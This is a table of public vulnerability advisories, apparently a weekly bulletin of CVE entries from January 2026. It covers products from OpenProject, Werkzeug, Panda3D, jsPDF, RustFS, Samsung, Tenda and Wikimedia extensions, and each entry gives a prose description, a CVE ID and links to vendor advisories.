| opf--openproject | OpenProject is an open-source, web-based project management software. Prior to version 16.6.2, OpenProject's unauthenticated password-change endpoint (/account/change_password) was not protected by the same brute-force safeguards that apply to the normal login form. In affected versions, an attacker who can guess or enumerate user IDs can send unlimited password-change requests for a given account without triggering lockout or other rate-limiting controls. This allows automated password-guessing (e.g., with wordlists of common passwords) against valid accounts. Successful guessing results in full account compromise for the targeted user and, depending on that user's role, can lead to further privilege escalation inside the application. This issue has been patched in version 16.6.2. Those who are unable to upgrade may apply the patch manually. | 2026-01-10 | not yet calculated | CVE-2026-22603 | https://github.com/opf/openproject/security/advisories/GHSA-93x5-prx9-x239 https://github.com/opf/openproject/pull/21272 https://github.com/opf/openproject/commit/2b394b9ba5af1e5d96a64d7d452d4d44598a4c7f https://github.com/opf/openproject/releases/tag/v16.6.2 |
| opf--openproject | OpenProject is an open-source, web-based project management software. For OpenProject versions from 11.2.1 to before 16.6.2, when sending a POST request to the /account/change_password endpoint with an arbitrary User ID as the password_change_user_id parameter, the resulting error page would show the username for the requested user. Since this endpoint is intended to be called without being authenticated, this allows enumeration of the user names of all accounts registered in an OpenProject instance. This issue has been patched in version 16.6.2. | 2026-01-10 | not yet calculated | CVE-2026-22604 | https://github.com/opf/openproject/security/advisories/GHSA-q7qp-p3vw-j2fh https://github.com/opf/openproject/pull/3451 https://github.com/opf/openproject/commit/2cff5e98649e32a197a62659a23dd4b864b7855b https://github.com/opf/openproject/releases/tag/v16.6.2 |
| pallets--werkzeug | Werkzeug is a comprehensive WSGI web application library. Prior to version 3.1.5, Werkzeug's safe_join function allows path segments with Windows device names that have file extensions or trailing spaces. On Windows, there are special device names such as CON, AUX, etc. that are implicitly present and readable in every directory. Windows still accepts them with any file extension, such as CON.txt, or with trailing spaces, such as `CON ` (CON followed by a space). This issue has been patched in version 3.1.5. | 2026-01-08 | not yet calculated | CVE-2026-21860 | https://github.com/pallets/werkzeug/security/advisories/GHSA-87hc-h4r5-73f7 https://github.com/pallets/werkzeug/commit/7ae1d254e04a0c33e241ac1cca4783ce6c875ca3 |
| Panda3D--Panda3D | The deploy-stub executable in Panda3D versions up to and including 1.10.16 contains a denial of service vulnerability due to unbounded stack allocation. deploy-stub allocates argv_copy and argv_copy2 using alloca() based directly on the attacker-controlled argc value without validation. Supplying a large number of command-line arguments can exhaust stack space and propagate uninitialized stack memory into Python interpreter initialization, resulting in a reliable crash and undefined behavior. | 2026-01-07 | not yet calculated | CVE-2026-22188 | https://seclists.org/fulldisclosure/2026/Jan/9 https://www.panda3d.org/ https://github.com/panda3d/panda3d https://www.vulncheck.com/advisories/panda3d-deploy-stub-stack-exhaustion-via-unbounded-alloca |
| Panda3D--Panda3D | The egg-mkfont tool in Panda3D versions up to and including 1.10.16 contains a stack-based buffer overflow vulnerability due to use of an unbounded sprintf() call with attacker-controlled input. When constructing glyph filenames, egg-mkfont formats a user-supplied glyph pattern (-gp) into a fixed-size stack buffer without length validation. Supplying an excessively long glyph pattern string can overflow the stack buffer, resulting in memory corruption and a deterministic crash. Depending on build configuration and execution environment, the overflow may also be exploitable for arbitrary code execution. | 2026-01-07 | not yet calculated | CVE-2026-22189 | https://seclists.org/fulldisclosure/2026/Jan/10 https://www.panda3d.org/ https://github.com/panda3d/panda3d https://www.vulncheck.com/advisories/panda3d-egg-mkfont-stack-buffer-overflow |
| Panda3D--Panda3D | The egg-mkfont tool in Panda3D versions up to and including 1.10.16 contains an uncontrolled format string vulnerability. The -gp (glyph pattern) command-line option is used directly as the format string for sprintf() with only a single argument supplied. If an attacker provides additional format specifiers, egg-mkfont may read unintended stack values and write the formatted output into generated .egg and .png files, resulting in disclosure of stack-resident memory and pointer values. | 2026-01-07 | not yet calculated | CVE-2026-22190 | https://seclists.org/fulldisclosure/2026/Jan/11 https://www.panda3d.org/ https://github.com/panda3d/panda3d https://www.vulncheck.com/advisories/panda3d-egg-mkfont-format-string-information-disclosure |
| parallax--jsPDF | jsPDF is a library to generate PDFs in JavaScript. Prior to version 4.0.0, user control of the first argument of the loadFile method in the node.js build allows local file inclusion/path traversal. If given the possibility to pass unsanitized paths to the loadFile method, a user can retrieve file contents of arbitrary files in the local file system the node process is running in. The file contents are included verbatim in the generated PDFs. Other affected methods are `addImage`, `html`, and `addFont`. Only the node.js builds of the library are affected, namely the `dist/jspdf.node.js` and `dist/jspdf.node.min.js` files. The vulnerability has been fixed in jsPDF@4.0.0. This version restricts file system access per default. This semver-major update does not introduce other breaking changes. Some workarounds are available. With recent node versions, jsPDF recommends using the `--permission` flag in production. The feature was introduced experimentally in v20.0.0 and is stable since v22.13.0/v23.5.0/v24.0.0. For older node versions, sanitize user-provided paths before passing them to jsPDF. | 2026-01-05 | not yet calculated | CVE-2025-68428 | https://github.com/parallax/jsPDF/security/advisories/GHSA-f8cm-6447-x5h2 https://github.com/parallax/jsPDF/commit/a688c8f479929b24a6543b1fa2d6364abb03066d https://github.com/parallax/jsPDF/releases/tag/v4.0.0 |
| Pinpoll--Pinpoll | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pinpoll Pinpoll pinpoll allows Reflected XSS. This issue affects Pinpoll: from n/a through <= 4.0.0. | 2026-01-08 | not yet calculated | CVE-2025-68889 | https://vdp.patchstack.com/database/Wordpress/Plugin/pinpoll/vulnerability/wordpress-pinpoll-plugin-3-0-22-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| PIONEER CORPORATION--USB DAC Amplifier APS-DA101JS | The installers for multiple products provided by PIONEER CORPORATION contain an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with the privileges of the running installer. | 2026-01-08 | not yet calculated | CVE-2026-21427 | https://jpn.pioneer/ja/support/software/stellanova/dac_driver/ https://jvn.jp/en/jp/JVN17956874/ |
| Plat'Home Co.,Ltd.--OpenBlocks IoT DX1 (FW5.0.x) | Authentication bypass issue exists in OpenBlocks series versions prior to FW5.0.8, which may allow an attacker to bypass administrator authentication and change the password. | 2026-01-06 | not yet calculated | CVE-2026-21411 | https://www.plathome.co.jp/support/software/fw5/dx1-v5-0-8/ https://jvn.jp/en/vu/JVNVU97172240/ |
| POSIMYTH--UiChemy | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in POSIMYTH UiChemy uichemy allows Stored XSS. This issue affects UiChemy: from n/a through <= 4.4.2. | 2026-01-06 | not yet calculated | CVE-2025-69362 | https://vdp.patchstack.com/database/Wordpress/Plugin/uichemy/vulnerability/wordpress-uichemy-plugin-4-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| preactjs--preact | Preact, a lightweight web development framework, includes JSON serialization protection that prevents Virtual DOM elements from being constructed from arbitrary JSON. A regression introduced in Preact 10.26.5 softened this protection. In applications where values from JSON payloads are assumed to be strings and passed unmodified to Preact as children, a specially crafted JSON payload could be constructed that would be incorrectly treated as a valid VNode. When this chain of failures occurs it can result in HTML injection, which can allow arbitrary script execution if not mitigated by CSP or other means. Applications using affected Preact versions are vulnerable if they meet all of the following conditions: first, they pass unmodified, unsanitized values from user-modifiable data sources (APIs, databases, local storage, etc.) directly into the render tree; second, they assume these values are strings but the data source could return actual JavaScript objects instead of JSON strings; and third, the data source either fails to perform type sanitization AND blindly stores/returns raw objects interchangeably with strings, OR is compromised (e.g., poisoned local storage, filesystem, or database). Versions 10.26.10, 10.27.3, and 10.28.2 patch the issue. The patched versions restore the previous strict equality checks that prevent JSON-parsed objects from being treated as valid VNodes. Other mitigations are available for those who cannot immediately upgrade: validate input types, cast or validate network data, sanitize external data, and use Content Security Policy (CSP). | 2026-01-08 | not yet calculated | CVE-2026-22028 | https://github.com/preactjs/preact/security/advisories/GHSA-36hm-qxxp-pg3m |
| Proxy & VPN Blocker--Proxy & VPN Blocker | Missing Authorization vulnerability in Proxy & VPN Blocker Proxy & VPN Blocker proxy-vpn-blocker allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Proxy & VPN Blocker: from n/a through <= 3.5.3. | 2026-01-06 | not yet calculated | CVE-2025-69353 | https://vdp.patchstack.com/database/Wordpress/Plugin/proxy-vpn-blocker/vulnerability/wordpress-proxy-vpn-blocker-plugin-3-5-3-broken-access-control-vulnerability?_s_id=cve |
| pterodactyl--panel | Pterodactyl is a free, open-source game server management panel. Versions 1.11.11 and below do not revoke active SFTP connections when a user is removed from a server instance or has their permissions changed with respect to file access over SFTP. This allows a user that was already connected to SFTP to remain connected and access files even after their permissions are revoked. A user must have been connected to SFTP at the time of their permissions being revoked in order for this vulnerability to be exploited. This issue is fixed in version 1.12.0. | 2026-01-06 | not yet calculated | CVE-2025-68954 | https://github.com/pterodactyl/panel/security/advisories/GHSA-8c39-xppg-479c https://github.com/pterodactyl/panel/commit/2bd9d8baddb0e0606e4a9d5be402f48678ac88d5 https://github.com/pterodactyl/panel/releases/tag/v1.12.0 |
| PublishPress--Post Expirator | Missing Authorization vulnerability in PublishPress Post Expirator post-expirator allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Post Expirator: from n/a through <= 4.9.3. | 2026-01-06 | not yet calculated | CVE-2025-69361 | https://vdp.patchstack.com/database/Wordpress/Plugin/post-expirator/vulnerability/wordpress-post-expirator-plugin-4-9-3-broken-access-control-vulnerability?_s_id=cve |
| purethemes--Listeo Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in purethemes Listeo Core listeo-core allows Reflected XSS. This issue affects Listeo Core: from n/a through < 2.0.19. | 2026-01-08 | not yet calculated | CVE-2025-67932 | https://vdp.patchstack.com/database/Wordpress/Plugin/listeo-core/vulnerability/wordpress-listeo-core-plugin-2-0-19-cross-site-scripting-xss-vulnerability?_s_id=cve |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to version 6.6.0, pypdf has possible long runtimes for missing /Root object with large /Size values. An attacker who uses this vulnerability can craft a PDF which leads to possibly long runtimes for actually invalid files. This can be achieved by omitting the /Root entry in the trailer, while using a rather large /Size value. Only the non-strict reading mode is affected. This issue has been patched in version 6.6.0. | 2026-01-10 | not yet calculated | CVE-2026-22690 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-4xc4-762w-m6cg https://github.com/py-pdf/pypdf/pull/3594 https://github.com/py-pdf/pypdf/commit/294165726b646bb7799be1cc787f593f2fdbcf45 https://github.com/py-pdf/pypdf/releases/tag/6.6.0 |
| py-pdf--pypdf | pypdf is a free and open-source pure-python PDF library. Prior to version 6.6.0, pypdf has possible long runtimes for malformed startxref. An attacker who uses this vulnerability can craft a PDF which leads to possibly long runtimes for invalid startxref entries. When rebuilding the cross-reference table, PDF files with lots of whitespace characters become problematic. Only the non-strict reading mode is affected. This issue has been patched in version 6.6.0. | 2026-01-10 | not yet calculated | CVE-2026-22691 | https://github.com/py-pdf/pypdf/security/advisories/GHSA-4f6g-68pf-7vhv https://github.com/py-pdf/pypdf/pull/3594 https://github.com/py-pdf/pypdf/commit/294165726b646bb7799be1cc787f593f2fdbcf45 https://github.com/py-pdf/pypdf/releases/tag/6.6.0 |
| QantumThemes--Typify | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in QantumThemes Typify typify allows PHP Local File Inclusion. This issue affects Typify: from n/a through <= 3.0.2. | 2026-01-08 | not yet calculated | CVE-2025-22712 | https://vdp.patchstack.com/database/Wordpress/Theme/typify/vulnerability/wordpress-typify-theme-3-0-2-local-file-inclusion-vulnerability?_s_id=cve |
| redaxo--redaxo | REDAXO is a PHP-based content management system. Prior to version 5.20.2, authenticated users with backup permissions can read arbitrary files within the webroot via path traversal in the Backup addon's file export functionality. The Backup addon does not validate the `EXPDIR` POST parameter against the UI-generated allowlist of permitted directories. An attacker can supply relative paths containing `../` sequences (or even absolute paths inside the document root) to include any readable file in the generated `.tar.gz` archive. Version 5.20.2 fixes this issue. | 2026-01-07 | not yet calculated | CVE-2026-21857 | https://github.com/redaxo/redaxo/security/advisories/GHSA-824x-88xg-cwrv https://github.com/redaxo/redaxo/releases/tag/5.20.2 |
| rezmoss--axios4go | axios4go is a Go HTTP client library. Prior to version 0.6.4, a race condition vulnerability exists in the shared HTTP client configuration. The global `defaultClient` is mutated during request execution without synchronization, directly modifying the shared `http.Client`'s `Transport`, `Timeout`, and `CheckRedirect` properties. Impacted applications include those that use axios4go with concurrent requests (multiple goroutines, `GetAsync`, `PostAsync`, etc.), those where different requests use different proxy configurations, and those that handle sensitive data (authentication credentials, tokens, API keys). Version 0.6.4 fixes this issue. | 2026-01-07 | not yet calculated | CVE-2026-21697 | https://github.com/rezmoss/axios4go/security/advisories/GHSA-cmj9-27wj-7x47 https://github.com/rezmoss/axios4go/commit/b651604c64e66a115ab90cdab358b0181d74a842 https://github.com/rezmoss/axios4go/releases/tag/v0.6.4 |
| RiceTheme--Felan Framework | Authentication Bypass Using an Alternate Path or Channel vulnerability in RiceTheme Felan Framework felan-framework allows Authentication Abuse. This issue affects Felan Framework: from n/a through <= 1.1.3. | 2026-01-08 | not yet calculated | CVE-2025-23504 | https://vdp.patchstack.com/database/Wordpress/Plugin/felan-framework/vulnerability/wordpress-felan-framework-plugin-1-1-3-account-takeover-vulnerability?_s_id=cve |
| RiceTheme--Felan Framework | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in RiceTheme Felan Framework felan-framework allows SQL Injection. This issue affects Felan Framework: from n/a through <= 1.1.3. | 2026-01-08 | not yet calculated | CVE-2025-23993 | https://vdp.patchstack.com/database/Wordpress/Plugin/felan-framework/vulnerability/wordpress-felan-framework-plugin-1-1-3-sql-injection-vulnerability?_s_id=cve |
| Ricoh Company, Ltd.--RICOH Streamline NX | Improper authorization vulnerability exists in RICOH Streamline NX 3.5.1 to 24R3. If a man-in-the-middle attack is conducted on the communication between the affected product and its user, and some crafted request is processed by the product, the user's registration information and/or OIDC (OpenID Connect) tokens may be retrieved. | 2026-01-09 | not yet calculated | CVE-2026-21409 | https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2025-000011 https://jvn.jp/en/jp/JVN12770174/ |
| RUCKUS Networks--vRIoT IOT Controller | The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 (GA) contain hardcoded credentials for an operating system user account within an initialization script. The SSH service is network-accessible without IP-based restrictions. Although the configuration disables SCP and pseudo-TTY allocation, an attacker can authenticate using the hardcoded credentials and establish SSH local port forwarding to access the Docker socket. By mounting the host filesystem via Docker, an attacker can escape the container and execute arbitrary OS commands as root on the underlying vRIoT controller, resulting in complete system compromise. | 2026-01-09 | not yet calculated | CVE-2025-69426 | https://support.ruckuswireless.com/security_bulletins/336 https://www.vulncheck.com/advisories/ruckus-vriot-iot-controller-hardcoded-ssh-credentials-rce |
| RUCKUS Networks--vRIoT IoT Controller | The Ruckus vRIoT IoT Controller firmware versions prior to 3.0.0.0 (GA) expose a command execution service on TCP port 2004 running with root privileges. Authentication to this service relies on a hardcoded Time-based One-Time Password (TOTP) secret and an embedded static token. An attacker who extracts these credentials from the appliance or a compromised device can generate valid authentication tokens and execute arbitrary OS commands with root privileges, resulting in complete system compromise. | 2026-01-09 | not yet calculated | CVE-2025-69425 | https://support.ruckuswireless.com/security_bulletins/336 https://www.vulncheck.com/advisories/ruckus-vriot-iot-controller-hardcoded-tokens-rce |
| RustCrypto--elliptic-curves | RustCrypto: Elliptic Curves is general purpose Elliptic Curve Cryptography (ECC) support, including types and traits for representing various elliptic curve forms, scalars, points, and public/secret keys composed thereof. In versions 0.14.0-pre.0 and 0.14.0-rc.0, a critical vulnerability exists in the SM2 Public Key Encryption (PKE) implementation where the ephemeral nonce k is generated with severely reduced entropy. A unit mismatch error causes the nonce generation function to request only 32 bits of randomness instead of the expected 256 bits. This reduces the security of the encryption from a 128-bit level to a trivial 16-bit level, allowing a practical attack to recover the nonce k and decrypt any ciphertext given only the public key and ciphertext. This issue has been patched via commit e4f7778. | 2026-01-10 | not yet calculated | CVE-2026-22698 | https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-w3g8-fp6j-wvqw https://github.com/RustCrypto/elliptic-curves/pull/1600 https://github.com/RustCrypto/elliptic-curves/commit/4781762f23ff22ab34763410f648128055c93731 https://github.com/RustCrypto/elliptic-curves/commit/e4f77788130d065d760e57fb109370827110a525 https://crates.io/crates/sm2/0.14.0-pre.0 https://crates.io/crates/sm2/0.14.0-rc.0 |
| RustCrypto--RSA | The `rsa` crate is an RSA implementation written in Rust. Prior to version 0.9.10, when creating an RSA private key from its components, the construction panics instead of returning an error when one of the primes is `1`. Version 0.9.10 fixes the issue. | 2026-01-08 | not yet calculated | CVE-2026-21895 | https://github.com/RustCrypto/RSA/security/advisories/GHSA-9c48-w39g-hm26 https://github.com/RustCrypto/RSA/commit/2926c91bef7cb14a7ccd42220a698cf4b1b692f7 |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.78, RustFS contains a path traversal vulnerability in the /rustfs/rpc/read_file_stream endpoint. This issue has been patched in version 1.0.0-alpha.79. | 2026-01-07 | not yet calculated | CVE-2025-68705 | https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc https://github.com/rustfs/rustfs/commit/ab752458ce431c6397175d167beee2ea00507d3e |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.77, a malformed gRPC GetMetrics request causes get_metrics to unwrap() failed deserialization of metric_type/opts, panicking the handler thread and enabling remote denial of service of the metrics endpoint. This issue has been patched in version 1.0.0-alpha.78. | 2026-01-07 | not yet calculated | CVE-2025-69255 | https://github.com/rustfs/rustfs/security/advisories/GHSA-gw2x-q739-qhcr https://github.com/rustfs/rustfs/commit/eb33e82b56ed11fd12bb39416359d8d60737dc7a |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. Prior to version 1.0.0-alpha.79, the `ImportIam` admin API validates permissions using `ExportIAMAction` instead of `ImportIAMAction`, allowing a principal with export-only IAM permissions to perform import operations. Since importing IAM data performs privileged write actions (creating/updating users, groups, policies, and service accounts), this can lead to unauthorized IAM modification and privilege escalation. Version 1.0.0-alpha.79 fixes the issue. | 2026-01-08 | not yet calculated | CVE-2026-22042 | https://github.com/rustfs/rustfs/security/advisories/GHSA-vcwh-pff9-64cc |
| rustfs--rustfs | RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 through 1.0.0-alpha.78, a flawed `deny_only` short-circuit in RustFS IAM allows a restricted service account or STS credential to self-issue an unrestricted service account, inheriting the parent's full privileges. This enables privilege escalation and bypass of session/inline policy restrictions. Version 1.0.0-alpha.79 fixes the issue. | 2026-01-08 | not yet calculated | CVE-2026-22043 | https://github.com/rustfs/rustfs/security/advisories/GHSA-xgr5-qc6w-vcg9 |
| Ryan Sutana--WP App Bar | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ryan Sutana WP App Bar wp-app-bar allows Reflected XSS. This issue affects WP App Bar: from n/a through <= 1.5. | 2026-01-08 | not yet calculated | CVE-2025-68891 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-app-bar/vulnerability/wordpress-wp-app-bar-plugin-1-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Salesforce--Uni2TS | Improper Control of Generation of Code ('Code Injection') vulnerability in Salesforce Uni2TS on MacOS, Windows, Linux allows Leverage Executable Code in Non-Executable Files. This issue affects Uni2TS: through 1.2.0. | 2026-01-09 | not yet calculated | CVE-2026-22584 | https://help.salesforce.com/s/articleView?id=005239354&type=1 |
| Samsung Mobile--Galaxy Store | Improper input validation in Galaxy Store prior to version 4.6.02 allows a local attacker to execute arbitrary script. | 2026-01-09 | not yet calculated | CVE-2026-20976 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Cloud | Improper handling of insufficient permission in Samsung Cloud prior to version 5.6.11 allows local attackers to access specific files in arbitrary path. | 2026-01-09 | not yet calculated | CVE-2026-20975 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Use after free in DualDAR prior to SMR Jan-2026 Release 1 allows local privileged attackers to execute arbitrary code. | 2026-01-09 | not yet calculated | CVE-2026-20968 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Improper input validation in SecSettings prior to SMR Jan-2026 Release 1 allows a local attacker to access files with system privileges. User interaction is required for triggering this vulnerability. | 2026-01-09 | not yet calculated | CVE-2026-20969 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Improper access control in SLocation prior to SMR Jan-2026 Release 1 allows local attackers to execute the privileged APIs. | 2026-01-09 | not yet calculated | CVE-2026-20970 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Use After Free in PROCA driver prior to SMR Jan-2026 Release 1 allows local attackers to potentially execute arbitrary code. | 2026-01-09 | not yet calculated | CVE-2026-20971 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Improper Export of Android Application Components in UwbTest prior to SMR Jan-2026 Release 1 allows local attackers to enable UWB. | 2026-01-09 | not yet calculated | CVE-2026-20972 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Samsung Mobile--Samsung Mobile Devices | Improper input validation in data related to network restrictions prior to SMR Jan-2026 Release 1 allows physical attackers to bypass Carrier Relock. | 2026-01-09 | not yet calculated | CVE-2026-20974 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=01 |
| Shahjada--Visitor Stats Widget | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shahjada Visitor Stats Widget visitor-stats-widget allows Reflected XSS. This issue affects Visitor Stats Widget: from n/a through <= 1.5.0. | 2026-01-08 | not yet calculated | CVE-2025-68874 | https://vdp.patchstack.com/database/Wordpress/Plugin/visitor-stats-widget/vulnerability/wordpress-visitor-stats-widget-plugin-1-5-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Shahjahan Jewel--Fluent Support | Missing Authorization vulnerability in Shahjahan Jewel Fluent Support fluent-support allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Fluent Support: from n/a through <= 1.10.4. | 2026-01-08 | not yet calculated | CVE-2025-67926 | https://vdp.patchstack.com/database/Wordpress/Plugin/fluent-support/vulnerability/wordpress-fluent-support-plugin-1-10-4-broken-access-control-vulnerability?_s_id=cve |
| Shahjahan Jewel--Ninja Tables | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Shahjahan Jewel Ninja Tables ninja-tables allows Blind SQL Injection. This issue affects Ninja Tables: from n/a through <= 5.2.4. | 2026-01-06 | not yet calculated | CVE-2025-69351 | https://vdp.patchstack.com/database/Wordpress/Plugin/ninja-tables/vulnerability/wordpress-ninja-tables-plugin-5-2-4-sql-injection-vulnerability?_s_id=cve |
| shinetheme--Traveler | Missing Authorization vulnerability in shinetheme Traveler traveler allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Traveler: from n/a through <= 3.2.6. | 2026-01-08 | not yet calculated | CVE-2025-67917 | https://vdp.patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-broken-access-control-vulnerability-2?_s_id=cve |
| silabs.com--Z-Wave Protocol Controller | An integer underflow vulnerability in the Silicon Labs Z-Wave Protocol Controller can lead to out of bounds memory reads. | 2026-01-05 | not yet calculated | CVE-2025-10933 | https://community.silabs.com/068Vm00000a4nNI |
| sizam--REHub Framework | Missing Authorization vulnerability in sizam REHub Framework rehub-framework allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects REHub Framework: from n/a through <= 19.9.5. | 2026-01-08 | not yet calculated | CVE-2025-14358 | https://vdp.patchstack.com/database/Wordpress/Plugin/rehub-framework/vulnerability/wordpress-rehub-framework-plugin-19-9-5-broken-access-control-vulnerability?_s_id=cve |
| Spencer Haws--Link Whisper Free | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spencer Haws Link Whisper Free link-whisper allows Reflected XSS. This issue affects Link Whisper Free: from n/a through <= 0.8.8. | 2026-01-08 | not yet calculated | CVE-2025-67927 | https://vdp.patchstack.com/database/Wordpress/Plugin/link-whisper/vulnerability/wordpress-link-whisper-free-plugin-0-8-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| StellarWP--The Events Calendar | Missing Authorization vulnerability in StellarWP The Events Calendar the-events-calendar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects The Events Calendar: from n/a through <= 6.15.12.2. | 2026-01-06 | not yet calculated | CVE-2025-69352 | https://vdp.patchstack.com/database/Wordpress/Plugin/the-events-calendar/vulnerability/wordpress-the-events-calendar-plugin-6-15-12-2-broken-access-control-vulnerability?_s_id=cve |
| taskbuilder--Taskbuilder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in taskbuilder Taskbuilder taskbuilder allows Reflected XSS. This issue affects Taskbuilder: from n/a through <= 4.0.9. | 2026-01-08 | not yet calculated | CVE-2025-67933 | https://vdp.patchstack.com/database/Wordpress/Plugin/taskbuilder/vulnerability/wordpress-taskbuilder-plugin-4-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| TECNO Mobile--com.afmobi.boomplayer | Insufficient Verification of Data Authenticity vulnerability in TECNO Mobile com.Afmobi.Boomplayer allows Authentication Bypass. This issue affects com.Afmobi.Boomplayer: 7.4.63. | 2026-01-06 | not yet calculated | CVE-2025-15385 | https://security.tecno.com/SRC/securityUpdates |
| Tenda--300Mbps Wireless Router F3 and N300 Easy Setup Router | This vulnerability exists in Tenda wireless routers (300Mbps Wireless Router F3 and N300 Easy Setup Router) due to the plaintext transmission of login credentials during the initial login or post-factory reset setup through the web-based administrative interface. An attacker on the same network could exploit this vulnerability by intercepting network traffic and capturing the credentials transmitted in plaintext. Successful exploitation of this vulnerability could allow the attacker to obtain sensitive information and gain unauthorized access to the targeted device. | 2026-01-09 | not yet calculated | CVE-2026-22079 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0004 |
| Tenda--300Mbps Wireless Router F3 and N300 Easy Setup Router | This vulnerability exists in Tenda wireless routers (300Mbps Wireless Router F3 and N300 Easy Setup Router) due to the transmission of credentials encoded using reversible Base64 encoding through the web-based administrative interface. An attacker on the same network could exploit this vulnerability by intercepting network traffic and capturing the Base64-encoded credentials. Successful exploitation of this vulnerability could allow the attacker to obtain sensitive information and gain unauthorized access to the targeted device. | 2026-01-09 | not yet calculated | CVE-2026-22080 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0004 |
| Tenda--300Mbps Wireless Router F3 and N300 Easy Setup Router | This vulnerability exists in Tenda wireless routers (300Mbps Wireless Router F3 and N300 Easy Setup Router) due to the missing HTTPOnly flag for session cookies associated with the web-based administrative interface. A remote attacker could exploit this vulnerability by capturing session cookies transmitted over an insecure HTTP connection. Successful exploitation of this vulnerability could allow the attacker to obtain sensitive information and gain unauthorized access to the targeted device. | 2026-01-09 | not yet calculated | CVE-2026-22081 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0004 |
| Tenda--300Mbps Wireless Router F3 and N300 Easy Setup Router | This vulnerability exists in Tenda wireless routers (300Mbps Wireless Router F3 and N300 Easy Setup Router) due to the use of login credentials as the session ID through its web-based administrative interface. A remote attacker could exploit this vulnerability by intercepting network traffic and capturing the session ID during insecure transmission. Successful exploitation of this vulnerability could allow the attacker to hijack an authenticated session and compromise sensitive configuration information on the targeted device. | 2026-01-09 | not yet calculated | CVE-2026-22082 | https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&VLCODE=CIVN-2026-0004 |
| The Wikimedia Foundation--Mediawiki - ApprovedRevs Extension | Improper Encoding or Escaping of Output due to magic word replacement in ParserAfterTidy vulnerability in The Wikimedia Foundation Mediawiki - ApprovedRevs Extension allows Input Data Manipulation. This issue affects Mediawiki - ApprovedRevs Extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-09 | not yet calculated | CVE-2026-22712 | https://phabricator.wikimedia.org/T412068 https://gerrit.wikimedia.org/r/q/Iee1bf1cbc8a519899e7f9dde508856bd4e5a5d2a |
| The Wikimedia Foundation--Mediawiki - GrowthExperiments Extension | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Wikimedia Foundation Mediawiki - GrowthExperiments Extension allows Cross-Site Scripting (XSS). This issue affects Mediawiki - GrowthExperiments Extension: 1.45, 1.44, 1.43, 1.39. | 2026-01-09 | not yet calculated | CVE-2026-22713 | https://phabricator.wikimedia.org/T411144 https://gerrit.wikimedia.org/r/q/Iff01940a163ed87ec52f3a64ba6b2dbfa2759df3 |
| The Wikimedia Foundation--Mediawiki - Monaco Skin | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Wikimedia Foundation Mediawiki - Monaco Skin allows Cross-Site Scripting (XSS). This issue affects Mediawiki - Monaco Skin: 1.45, 1.44, 1.43, 1.39. | 2026-01-08 | not yet calculated | CVE-2026-22714 | https://phabricator.wikimedia.org/T411126 https://gerrit.wikimedia.org/r/q/I00b2e369fa189803380ca7409022a11b670d2500 |
